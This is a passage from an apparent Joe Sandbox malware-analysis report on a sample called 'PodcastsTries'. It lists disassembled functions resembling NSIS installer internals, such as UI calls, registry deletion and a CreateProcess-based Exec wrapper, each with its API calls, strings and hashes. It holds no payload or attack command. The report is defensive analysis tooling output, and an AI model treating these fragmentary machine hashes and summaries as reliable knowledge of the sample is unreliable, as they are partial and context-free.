                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                          • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                          Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                          Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(0006EA00,00000064,00133664), ref: 00403295
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                          Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
